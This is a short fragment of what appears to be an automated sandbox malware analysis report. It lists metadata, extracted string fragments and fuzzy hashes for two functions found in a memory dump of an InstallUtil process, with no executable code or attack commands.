                                Function 0675CED8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$$]q$$]q$]\-
                                • API String ID: 0-1335456926
                                • Opcode ID: ae965024d37207db7563d558608b0d3e499a72c38d0bea88b84c66325eee7766
                                • Instruction ID: d7cd9190eb7f053a3fc7b827c1734d98eadc8f216b7d7d4e7772b19f09f3cd01
                                • Opcode Fuzzy Hash: ae965024d37207db7563d558608b0d3e499a72c38d0bea88b84c66325eee7766
                                • Instruction Fuzzy Hash: BA712930B002098FCB59EFA4C5916AEB7F6AF84304F25C4A9D846DB359DB75DC82CB81
                                Function 06758138 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ^\-$/^\-$0^\-$t^\-
                                • API String ID: 0-1740364902
                                • Opcode ID: 8aff961413d2dfbf32b17478e9a56b616039fb09750ef44c2b0e4812d7800afa
                                • Instruction ID: dc042b5cf07334594dccbcc56b80c901840028a7c58ee20c1bd936b8d974e60b
                                • Opcode Fuzzy Hash: 8aff961413d2dfbf32b17478e9a56b616039fb09750ef44c2b0e4812d7800afa
                                • Instruction Fuzzy Hash: 13412330B001154FCB88E779981576EB6EBAFC0390F058068D909CB3A5EEB4DE0683A7